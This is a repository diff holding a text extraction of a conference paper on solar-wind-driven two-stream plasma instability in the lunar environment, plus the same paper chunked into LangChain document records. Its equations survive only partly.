+ look for the expression for a specific k which gives the
609
+ maximum growth.The ne variation is taken as 10 cm-3, 50
610
+ cm-3, 100 cm-3, 200 cm-3 and 300 cm-3.
611
+
612
+ Figure 2: The growth factor with k for different ne.
613
+ Let K = (1 + α + 3α1/3 + 3α2/3), equation (20) becomes
614
+
615
+
616
+
617
+
618
+ √ (
619
+
620
+ ⁄ )
621
+
622
+ ⁄ (
623
+
624
+
625
+ ) [
626
+
627
+
628
+ ]
629
+
630
+
631
+ - (21)
632
+
633
+
634
+
635
+
636
+
637
+
638
+ √ (
639
+
640
+ ⁄ )
641
+ [
642
+ (
643
+
644
+
645
+ )
646
+
647
+
648
+
649
+
650
+
651
+
652
+
653
+
654
+ (
655
+
656
+
657
+ )
658
+
659
+
660
+ ]
661
+ For maxima dωim/dωd = 0
662
+
663
+
664
+
665
+
666
+ √ (
667
+
668
+ ⁄ )
669
+ [
670
+ (
671
+
672
+
673
+ )
674
+
675
+
676
+
677
+
678
+
679
+
680
+
681
+
682
+ (
683
+
684
+
685
+ )
686
+
687
+
688
+ ]
689
+ which gives
690
+
691
+
692
+
693
+
694
+ Now ωd = kvb, hence we get
695
+
696
+
697
+
698
+
699
+
700
+ Inserting K from above
701
+ (
702
+
703
+ ) √
704
+
705
+
706
+
707
+
708
+ 4.2 Decay Rate
709
+ When the dispersion relation is expanded in the Taylor
710
+ series, the complex solutions comes
711
+ √ ( )
712
+ ( )
713
+ This gives two solutions which are complex conjugates of
714
+ each other. The imaginary partgives the beam plasma
715
+ instability and the other a propagating mode.
716
+ E = E0ei(kx-ωt) , ω = ωr ± iωim, ( )
717
+ which becomes
718
+ ( )
719
+ The solution corresponding to +ωim correspond to the
720
+ instability and the solution with −ωim corresponds to a
721
+ decaying mode as with time the amplitude will decrease.
722
+ These growing and decaying modes show striking
723
+ similarity in its properties with the instabilities. The decay
724
+ rate with respect to k value of the modes for different
725
+ values of ne is shown in Figure 3. It can be seen from the
726
+ figure that a mode with highest decay rate will decay
727
+ early and with increasing ne, the k value with the highest
728
+ decay rate will also increase.
729
+ Therefore, it can be concluded that the solar wind impact
730
+ on the lunar plasma can trigger (i) Langmuir plasma
731
+ oscillations; (ii) Right beam propagating modes; (iii)
732
+ Beam-plasma instability; (iv) Beam plasma decay mode.
733
+
734
+ Figure 3: Symmetric nature of decay and growth rates.
735
+ The growth rate and decay rate are symmetric to each
736
+ other which means for a given ne, the maximum growth
737
+ rate and decay rate occur at the same k value. This strong
738
+ symmetric nature suggests a strong energy exchange
739
+ mechanism i.e. with time the instability modes gain
740
+ energy and in other case with time the decay modes loose
741
+ energy. It suggests that a resonance exist between the
742
+ solar wind, lunar plasma and plasma instability where
743
+ during the instability growth the solar wind dump energy
744
+ in the lunar plasma and during the decay the lunar plasma
745
+ pumps energy in the solar wind quenching the instability.
746
+ 4. References
747
+ 1. Mickael Melzani, “Plasma Instabilities”, Centre de
748
+ Recherche Astrophysique de Lyon, Ecole Normale
749
+ Superieure de Lyon, France, 2014, Page: 1-24
750
+ 2. Alexander Piel, “Plasma Physics”, Springer-Verlag,
751
+ Berlin Heidelberg, doi:10.1007/978-3-642-10491-6
752
+ 3. D. Anderson, R. Fedele, & M. Lisak, “A tutorial
753
+ presentation of the two stream instability and Landau
754
+ damping”, Am. J. Phys., 69 (12), 2001, 1262-1266,
755
+ doi:10.1119/1.14072521
756
+
757
+ 0.35
758
+ ne=10cmA3
759
+ ne=50cm^3
760
+ ne=100cm^3
761
+ E"O
762
+ ne=200cm^3
763
+ ne=300cmA3
764
+ 0.25
765
+ .pe
766
+ m/!-m
767
+ 0.2
768
+ 0.15
769
+ 0.1 -
770
+ 0.05
771
+ 0.5
772
+ 1.5
773
+ 2
774
+ 2.5
775
+ 3
776
+ 3.5
777
+ 4.5
778
+ w_d/w_pe0.4
779
+ ne=10cmA3
780
+ ne =50cmA3
781
+ 0.3
782
+ ne=100cmA-3
783
+ ne=200cm^3
784
+ ne=300cmA-3
785
+ 0.2 -
786
+ w_im/w_pe
787
+ 0.1
788
+ -0.1
789
+ 2'0-
790
+ 0.3 -
791
+ 0.4
792
+ 0
793
+ 0.5
794
+ 1
795
+ 1.5
796
+ 2
797
+ 2.5
798
+ 3
799
+ 3.5
800
+ 4.5
801
+ w_d/w_pe
HtE0T4oBgHgl3EQfhwE8/content/tmp_files/load_file.txt ADDED
@@ -0,0 +1,155 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ filepath=/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf,len=154
2
+ page_content='1 URSI RCRS 2022, IIT (Indore), India, 1 –4 December, 2022 Streaming Instability Generation in Lunar Plasma Environment Mehul Chakraborty1, Vipin K.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
3
+ page_content=' Yadav2* and Rajneesh Kumar1 1 Department of Physics, Banaras Hindu University (BHU), Varanasi 221005, India 2 Space Physics Laboratory (SPL), Vikram Sarabhai Space Centre (VSSC), Thiruvananthapuram 695022, India * Corresponding Author: vipin_ky@vssc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
4
+ page_content='gov.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
5
+ page_content='in Abstract Plasma instabilities are the non-linear processes occurring in plasmas when excess energy gets accumulated in a plasma system which is unable to hold it.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
6
+ page_content=' There are almost 60 known plasma instabilities in nature.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
7
+ page_content=' 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
8
+ page_content=' Introduction The phenomena of plasma instability takes place in a plasma where excess energy is accumulated due to the free energy sources.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
9
+ page_content=' The plasma instabilities are often observed in plasma systems residing in space such as the Sun, the planetary ionospheres, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
10
+ page_content=' Earth‟s natural satellite Moon has a very thin atmosphere and subsequently feeble plasma environment.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
11
+ page_content=' However, this tenuous plasma environment is a place of several non- linear plasma phenomena.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
12
+ page_content=' The solar wind, which strikes the lunar surface unhindered due to the absence of global lunar magnetic field, is capable of triggering plasma instability around the lunar exosphere.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
13
+ page_content=' 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
14
+ page_content=' Plasma Instabilities Plasma instability is a physical phenomenon which occurs in plasma when an energy build-up takes place there taking the plasma system away from the equilibrium.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
15
+ page_content=' This energy build can lead to the plasma particle loss either by the generation of plasma waves or the particle beams or deformations in the stable plasma structures.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
16
+ page_content=' It is, however, to be noted that the total energy of the system is conserved as the instabilities only transfer the free energy from one place to another.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
17
+ page_content=' The free energy in a plasma system can be in the form of beam kinetic energy, pressure gradients in an effective potential (a light fluid supporting a heavier fluid), anisotropies in the velocity distribution (particle kinetic energy), energy stored in a magnetic field, Spatio-temporal variation in the electric field, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
18
+ page_content=' Plasma instabilities are often associated with plasma waves supported by the plasma system.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
19
+ page_content=' The linear phase of a plasma instability is initiated by a set of waves which are unstable and have an exponential growth rate.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
20
+ page_content=' Out of all the unstable plasma modes, the one having the highest growth rate will drive the plasma dynamics and structure with its periodicity and location in plasma.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
21
+ page_content=' This dominant mode is defined by the plasma parameters and all other unstable modes will generate fluctuations around the dominant mode.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
22
+ page_content=' Plasma instabilities can be classified in many ways which are as follows [Melzani, 2014]: 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
23
+ page_content=' Instabilities with names: Buneman instability, Weibel instability, Rayleigh-Taylor (RT) instability, Kelvin- Helmholtz (K-H) instability, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
24
+ page_content=' 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
25
+ page_content=' Theory Instabilities: Ideal MHD instability, Resistive plasma instability, Kinetic instability, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
26
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
27
+ page_content=' Instabilities with physical configuration: Two-stream instability, Bump-in-the-tail instability, Filamentation instability, Kink instability, Sausage instability, Ballooning instability, Tearing instability, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
28
+ page_content=' 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
29
+ page_content=' Instabilities with plasma waves: Ion acoustic instability, Mirror-mode instability, Ion cyclotron instability, Electron-heat-flux instability, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
30
+ page_content=' Apart from these there are some other plasma instabilities such as resonant and non-resonant instabilities, micro- and macro instabilities, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
31
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
32
+ page_content=' Instability Analysis in Lunar Plasma Environment and Results Plasma (Two-stream) instability is analysed in the lunar ionosphere where the solar-wind (electron beam) interacts with the lunar background plasma containing electrons.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
33
+ page_content=' The ion number density being low in both solar wind as well as the lunar ionosphere is neglected here.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
34
+ page_content=' The conditions for the instabilities to generate are analyzed from the plasma instability dispersion relation.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
35
+ page_content=' The plasma conditions may not be always suitable for the instabilities to evolve as the instability occurrence involves the solar wind electron number density, the solar wind velocity and the background plasma electron number density.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
36
+ page_content=' Favorable values of these three quantities give instabilities at various lunar altitudes.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
37
+ page_content=' Once the instability is generated, an attempt shall be made for the estimation of the growth rates of these instabilities which in turn will provide information regarding the temporal evolution of these instabilities.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
38
+ page_content='The dielectric function of the beam-plasma system for various values of α [Piel, 2010] is shown in Figure 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
39
+ page_content=' U.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
40
+ page_content=' R2 Figure 1: Beam-plasma dielectric function [Piel, 2010].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
41
+ page_content=' For a given value of the plasma and the solar wind (beam) parameters, if a kis above the threshold then there will be four real solutions.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
42
+ page_content=' On decreasing, when the kgoes below the threshold, the maxima go below zero and the left beam mode and right plasma mode merged and can be seen in Figure 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
43
+ page_content=' The dispersion relation obtained from the analysis of beam plasma instability is [Anderson et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
44
+ page_content=',' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
45
+ page_content=' 2001] ( ⃗⃗⃗ ⃗⃗⃗⃗⃗⃗⃗ ) (1) ( ⃗ ) ( ⃗⃗⃗ ⃗⃗⃗⃗⃗⃗⃗ ) (2) The term ⃗⃗⃗ ⃗⃗⃗⃗⃗⃗ (Doppler shifted frequency) and (3) Hence,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
46
+ page_content=' the dispersion relation becomes ( ⃗ ) ( ) (4) The local extremum of this function is obtained ( ) (5) which becomes ( ) (6) and gives ( ⁄ ) [( ) ( ⁄ ) ( ⁄ ) ( )] (7) Case 1: When 1stterm is zero in equation (7) ( ⁄ ) Now,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
47
+ page_content=' ω = ωm when dD/dω = 0 ( ⁄ )(8) If we put back the expression of alpha then it becomes ⁄ ( ⁄ ⁄ ) (9) This is the local maxima of the function Case 2: When 2nd term is zero in above equation ( ⁄ ⁄ ) ( ⁄ ) ω is obtained from this quadratic equation as: ( ⁄ ) √ ⁄ ( ⁄ ⁄ ) Here,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
48
+ page_content=' the solution is complex unable to give the local extremum of the dispersion function.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
49
+ page_content=' Hence, the 1st case real solution is considered to find the local maxima as ( ⃗ ) ( ) (10) Substituting ωmfrom (8), we get ( ⃗ ) ⁄ ( ⁄ ) (11) This local maxima determines when instability isgenerated.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
50
+ page_content=' The maxima depend on the solar wind and lunar plasma parameters.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
51
+ page_content=' Two cases exist here, one where Dm > 0 and the other when Dm < 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
52
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
53
+ page_content='1 Dm > 0: Real roots When Dm > 0, four real roots of the dispersion relation are obtained as follows (K = e2/mε0): ( ⃗ ) ( ) = 0 (12) which gives ( ) ( ) ( ) (13) It is evident from this 4th order quartic equation in ω terms that there are two singularities at the 2nd and 3rd term.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
54
+ page_content=' The D (ω, k) expression gives singularity at ω = 0 due to the space charge of lunar plasma.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
55
+ page_content=' This is the plasma singularity and the modes (normal plasma space charge oscillations) around this singularity are also solar wind independent.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
56
+ page_content=' The other singularity is at ω = ωd which occurs only when there is a beam (the solar wind) in the system irrespective of its strength (the number density and velocity).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
57
+ page_content=' The value of beam singularity ωd = kvb is large as vb is of the order of 105m/sec (solar wind velocity) and is located far away from the origin.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
58
+ page_content=' The nature of dispersion relation remains independent of the singularity ωd = kvb and also around the 2nd singularity (one singularity doesn‟t affect the nature around another singularity).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
59
+ page_content=' So, it can be split into two parts - one containing the plasma singularity and the other containing the beam modes and solved separately for the four propagating plasma modes.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
60
+ page_content=' ( ⃗ ) ( ) = 0 Near ω ≈ 0, 1 – ωp 2/ω2 = 0 giving 2 roots (plasma modes) √ Near ω ≈ ωd ( ) which also gives 2 roots which are called beam modes √ √ The phase velocities of these two beam modes are √ √ The two beam modes are travelling waves with different phase velocities but same group velocities which imply 2 3 dielectric function 0 2 0p0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
61
+ page_content='001 .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
62
+ page_content='. .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
63
+ page_content=',0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
64
+ page_content='01 4 0g=0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
65
+ page_content='1 2 1 0 1 2 3 w/wpe3 these modes are superposition of many waves.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
66
+ page_content=' Also, the group velocity is equal to the beam velocity which suggests that the beam modes are in resonance with the beam itself and this can lead to an interaction between the modes and the beam.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
67
+ page_content=' The other two plasma modes have both zero phase and group velocity, because they are plasma oscillations.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
68
+ page_content=' These modes can become plasma waves if the thermal velocities of plasma constituents are taken into account in the analysis which is not doing here assuming „cold‟ lunar plasma.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
69
+ page_content=' In summary of the propagating modes, two beam (solar wind) independent solutions are obtained and these two exist due to the lunar plasma and the other two modes (travelling waves) comes into existence only when the solar wind with high velocities comes and interacts with the lunar plasma.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
70
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
71
+ page_content='2 Dm < 0: Complex roots The instability will be seen only if Dm ≤ 0 and this condition give a threshold for the plasma instability generation as ( ⃗ ) * ⁄ + ( ⁄ ) Now,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
72
+ page_content=' ,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
73
+ page_content=' ,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
74
+ page_content=' ,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
75
+ page_content=' ⃗ ⃗⃗⃗⃗⃗⃗ Substituting these values in the above relation ( ) ⁄ + [ ( ) ⁄ ] The threshold for lunar instability generation is given as ( ) ⁄ + [ ( ) ⁄ ] (14) It can be inferred here that for the given values of lunar plasma density ne,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
76
+ page_content=' the solar wind (beam) number density nb and solar wind (beam) velocity vb,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
77
+ page_content=' an instability will always get triggered.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
78
+ page_content='The lunar plasma number density is typically in range 10 cm-3 to 300 cm-3and the solar wind parameters are nb = 5 cm-3 and vb = 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
79
+ page_content='75 × 105m/sec.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
80
+ page_content=' At any given lunar altitude where the value of these parameters is known, the propagation constants can be obtained for which the instability gets generated.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
81
+ page_content=' Hence, at a specific altitude, multiple instabilities of different k can be triggered leading to the generation of multiple plasma waves.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
82
+ page_content=' 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
83
+ page_content=' Lunar Plasma Instability: Results 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
84
+ page_content='1 Growth Factor When the local maxima of D(ω, k) goes below zero then the two roots vanish, and only a single plasma and beam mode survive.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
85
+ page_content=' These two roots are complex conjugates of each other (ω = ωr ± ωim) and are obtained by Taylor expansion of the dispersion function about the maxima.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
86
+ page_content=' Expanding D(ω,k) about the local maxima ωm as given in equation (8) ( ) ( ) ( ) | ( ) | (15) Now, D(ωm) is given by equation (11), D(ωm) < 0 which is the threshold and D′(ωm) = 0 since this point is local maxima and also D′′(ωm) < 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
87
+ page_content=' The required dispersion relation is D(ω) = 0 which is a quadratic equation in terms of (ω − ωm) ( ) ( ) ( ) ( ) ( ) ( ) √( ( )) ( ) ( ) ( ) = 0 But D′(ωm) = 0, hence √ ( ) ( ) Both quantities inside the root are positive, so by Taylor expansion, the dispersion relation about the maxima gives two complex conjugate roots for ω.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
88
+ page_content='The real part of ω is given as ωre ( ⁄ ) ⁄ ( ⁄ ⁄ ) (16) And it gives the phase and group velocities of instability ( ⁄ ) ( ⁄ ) In these expressions, when α ≪1, there is resonance between the instability‟s propagation and the movement of the solar wind (beam) making energy transfer from electrons to the instability.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
89
+ page_content=' The imaginary part of ω is the growth rate (amplitude increase with time) √ ( ) ( ) (17) Now,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
90
+ page_content=' the term D′′(ωm) is obtained from equation (5) as ( ) + (18) At ω = ωm,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
91
+ page_content=' and using equation (8),' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
92
+ page_content=' equation (18) becomes ( ⁄ ) ⁄ + (19) D(ωm) and d2D/dω2 are inserted in equation (17) to obtain √ ( ⁄ ) ⁄ [ ( ⁄ ) ⁄ ( ⁄ ) ⁄ ⁄ ] ⁄ Dividing the whole by ωp 2 and taking ωb 2/ωp 2 = α,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
93
+ page_content=' it becomes ⁄ √ ( ⁄ ) ⁄ ( ) [ ( ⁄ ⁄ ) ] ⁄ - (20) This expression shows that that the growth factor depends on lunar plasma,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
94
+ page_content=' solar wind (beam) parameters and the k of plasma wave.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
95
+ page_content=' At a given lunar altitude, multiple 4 different instability modes can exist which are differentiated by their k as per the threshold.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
96
